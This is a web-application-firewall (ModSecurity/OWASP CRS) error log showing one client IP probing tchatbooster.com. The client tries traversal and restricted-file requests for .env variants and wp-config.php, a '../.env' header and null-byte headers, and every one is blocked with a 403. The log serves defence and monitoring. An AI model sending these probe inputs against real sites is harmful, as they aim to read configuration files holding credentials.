[Tue May 12 04:39:30.801636 2026] [security2:error] [pid 1820198:tid 1820205] [client 45.148.10.166:36568] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tchatbooster.com"] [uri "/health"] [unique_id "agKS4s1tk6y7yBJLpJopxgAAAIU"]
[Tue May 12 04:39:30.801662 2026] [security2:error] [pid 1820198:tid 1820205] [client 45.148.10.166:36568] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tchatbooster.com"] [uri "/health"] [unique_id "agKS4s1tk6y7yBJLpJopxgAAAIU"]
[Tue May 12 04:39:30.801867 2026] [security2:error] [pid 1820198:tid 1820205] [client 45.148.10.166:36568] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/health"] [unique_id "agKS4s1tk6y7yBJLpJopxgAAAIU"]
[Tue May 12 04:39:30.801930 2026] [security2:error] [pid 1820198:tid 1820205] [client 45.148.10.166:36568] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/health"] [unique_id "agKS4s1tk6y7yBJLpJopxgAAAIU"]
[Tue May 12 04:39:30.802348 2026] [security2:error] [pid 1820198:tid 1820205] [client 45.148.10.166:36568] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 22)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/health"] [unique_id "agKS4s1tk6y7yBJLpJopxgAAAIU"]
[Tue May 12 04:39:31.083612 2026] [security2:error] [pid 1730207:tid 1730226] [client 45.148.10.166:36592] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKS4jue9Sp-pIv_Bb61UgAAAVE"]
[Tue May 12 04:39:31.100572 2026] [security2:error] [pid 1820198:tid 1820202] [client 45.148.10.166:57166] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env.production"] [unique_id "agKS481tk6y7yBJLpJopxwAAAII"], referer: https://tchatbooster.com/assets../../.env.production
[Tue May 12 04:39:31.100797 2026] [security2:error] [pid 1820198:tid 1820202] [client 45.148.10.166:57166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env.production"] [unique_id "agKS481tk6y7yBJLpJopxwAAAII"], referer: https://tchatbooster.com/assets../../.env.production
[Tue May 12 04:39:31.185222 2026] [security2:error] [pid 1730207:tid 1730213] [client 45.148.10.166:37432] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKS4jue9Sp-pIv_Bb61VAAAAUQ"], referer: https://tchatbooster.com/www/.env
[Tue May 12 04:39:31.213062 2026] [security2:error] [pid 1730207:tid 1730226] [client 45.148.10.166:36592] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tchatbooster.com"] [uri "/.env"] [unique_id "agKS4zue9Sp-pIv_Bb61VQAAAVE"]
[Tue May 12 04:39:31.213276 2026] [security2:error] [pid 1730207:tid 1730226] [client 45.148.10.166:36592] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/.env"] [unique_id "agKS4zue9Sp-pIv_Bb61VQAAAVE"]
[Tue May 12 04:39:31.458721 2026] [security2:error] [pid 1820198:tid 1820205] [client 45.148.10.166:36568] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 22 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKS4s1tk6y7yBJLpJopxgAAAIU"]
[Tue May 12 04:39:31.478424 2026] [security2:error] [pid 1730207:tid 1730213] [client 45.148.10.166:37432] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/health"] [unique_id "agKS4zue9Sp-pIv_Bb61VgAAAUQ"], referer: https://tchatbooster.com/health?X-App-Env=%00
[Tue May 12 04:39:31.478480 2026] [security2:error] [pid 1730207:tid 1730213] [client 45.148.10.166:37432] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:Referer outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/health"] [unique_id "agKS4zue9Sp-pIv_Bb61VgAAAUQ"], referer: https://tchatbooster.com/health?X-App-Env=%00
[Tue May 12 04:39:31.478508 2026] [security2:error] [pid 1730207:tid 1730213] [client 45.148.10.166:37432] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/health"] [unique_id "agKS4zue9Sp-pIv_Bb61VgAAAUQ"], referer: https://tchatbooster.com/health?X-App-Env=%00
[Tue May 12 04:39:31.478543 2026] [security2:error] [pid 1730207:tid 1730213] [client 45.148.10.166:37432] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/health"] [unique_id "agKS4zue9Sp-pIv_Bb61VgAAAUQ"], referer: https://tchatbooster.com/health?X-App-Env=%00
[Tue May 12 04:39:31.478767 2026] [security2:error] [pid 1730207:tid 1730213] [client 45.148.10.166:37432] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/health"] [unique_id "agKS4zue9Sp-pIv_Bb61VgAAAUQ"], referer: https://tchatbooster.com/health?X-App-Env=%00
[Tue May 12 04:39:31.478803 2026] [security2:error] [pid 1730207:tid 1730213] [client 45.148.10.166:37432] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/health"] [unique_id "agKS4zue9Sp-pIv_Bb61VgAAAUQ"], referer: https://tchatbooster.com/health?X-App-Env=%00
[Tue May 12 04:39:31.479246 2026] [security2:error] [pid 1730207:tid 1730213] [client 45.148.10.166:37432] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 26)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/health"] [unique_id "agKS4zue9Sp-pIv_Bb61VgAAAUQ"], referer: https://tchatbooster.com/health?X-App-Env=%00
[Tue May 12 04:39:31.591596 2026] [security2:error] [pid 1820198:tid 1820202] [client 45.148.10.166:57166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKS481tk6y7yBJLpJopxwAAAII"], referer: https://tchatbooster.com/assets../../.env.production
[Tue May 12 04:39:31.614687 2026] [security2:error] [pid 1820198:tid 1820205] [client 45.148.10.166:36568] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /assets../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/wp-config.php"] [unique_id "agKS481tk6y7yBJLpJopyQAAAIU"]
[Tue May 12 04:39:31.614761 2026] [security2:error] [pid 1820198:tid 1820205] [client 45.148.10.166:36568] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tchatbooster.com"] [uri "/wp-config.php"] [unique_id "agKS481tk6y7yBJLpJopyQAAAIU"]
[Tue May 12 04:39:31.614957 2026] [security2:error] [pid 1820198:tid 1820205] [client 45.148.10.166:36568] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/wp-config.php"] [unique_id "agKS481tk6y7yBJLpJopyQAAAIU"]
[Tue May 12 04:39:31.665091 2026] [security2:error] [pid 1730207:tid 1730226] [client 45.148.10.166:36592] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKS4zue9Sp-pIv_Bb61VQAAAVE"]
[Tue May 12 04:39:31.684925 2026] [security2:error] [pid 1820198:tid 1820202] [client 45.148.10.166:57166] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKS481tk6y7yBJLpJopygAAAII"], referer: https://tchatbooster.com/.env
[Tue May 12 04:39:31.685151 2026] [security2:error] [pid 1820198:tid 1820202] [client 45.148.10.166:57166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKS481tk6y7yBJLpJopygAAAII"], referer: https://tchatbooster.com/.env
[Tue May 12 04:39:31.971470 2026] [security2:error] [pid 1730207:tid 1730213] [client 45.148.10.166:37432] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 26 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKS4zue9Sp-pIv_Bb61VgAAAUQ"], referer: https://tchatbooster.com/health?X-App-Env=%00
[Tue May 12 04:39:32.014738 2026] [security2:error] [pid 1730207:tid 1730226] [client 45.148.10.166:36592] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tchatbooster.com"] [uri "/health"] [unique_id "agKS5Due9Sp-pIv_Bb61WAAAAVE"]
[Tue May 12 04:39:32.014791 2026] [security2:error] [pid 1730207:tid 1730226] [client 45.148.10.166:36592] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tchatbooster.com"] [uri "/health"] [unique_id "agKS5Due9Sp-pIv_Bb61WAAAAVE"]
[Tue May 12 04:39:32.014818 2026] [security2:error] [pid 1730207:tid 1730226] [client 45.148.10.166:36592] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tchatbooster.com"] [uri "/health"] [unique_id "agKS5Due9Sp-pIv_Bb61WAAAAVE"]
[Tue May 12 04:39:32.015415 2026] [security2:error] [pid 1730207:tid 1730226] [client 45.148.10.166:36592] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 12)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/health"] [unique_id "agKS5Due9Sp-pIv_Bb61WAAAAVE"]
[Tue May 12 04:39:32.071560 2026] [security2:error] [pid 1820198:tid 1820205] [client 45.148.10.166:36568] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKS481tk6y7yBJLpJopyQAAAIU"]
[Tue May 12 04:39:32.093252 2026] [security2:error] [pid 1730207:tid 1730213] [client 45.148.10.166:37432] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/wp-config.php"] [unique_id "agKS5Due9Sp-pIv_Bb61WgAAAUQ"], referer: https://tchatbooster.com/assets../../wp-config.php
[Tue May 12 04:39:32.093466 2026] [security2:error] [pid 1730207:tid 1730213] [client 45.148.10.166:37432] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/wp-config.php"] [unique_id "agKS5Due9Sp-pIv_Bb61WgAAAUQ"], referer: https://tchatbooster.com/assets../../wp-config.php
[Tue May 12 04:39:32.171163 2026] [security2:error] [pid 1820198:tid 1820202] [client 45.148.10.166:57166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKS481tk6y7yBJLpJopygAAAII"], referer: https://tchatbooster.com/.env
[Tue May 12 04:39:32.208559 2026] [security2:error] [pid 1820198:tid 1820205] [client 45.148.10.166:36568] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tchatbooster.com"] [uri "/.env.local"] [unique_id "agKS5M1tk6y7yBJLpJopywAAAIU"]
[Tue May 12 04:39:32.208774 2026] [security2:error] [pid 1820198:tid 1820205] [client 45.148.10.166:36568] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/.env.local"] [unique_id "agKS5M1tk6y7yBJLpJopywAAAIU"]
[Tue May 12 04:39:32.482296 2026] [security2:error] [pid 1730207:tid 1730226] [client 45.148.10.166:36592] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 12 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Invalid character in request (null character)"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKS5Due9Sp-pIv_Bb61WAAAAVE"]
